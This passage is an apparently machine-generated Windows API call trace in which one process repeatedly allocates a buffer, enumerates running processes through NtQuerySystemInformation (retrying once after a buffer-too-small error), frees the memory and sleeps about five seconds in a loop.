NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.157] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.173] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.189] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.203] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.219] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.238] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.250] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.336] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.362] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.678] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.738] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.812] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0110.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0110.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0110.835] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0110.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0110.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0110.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0110.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 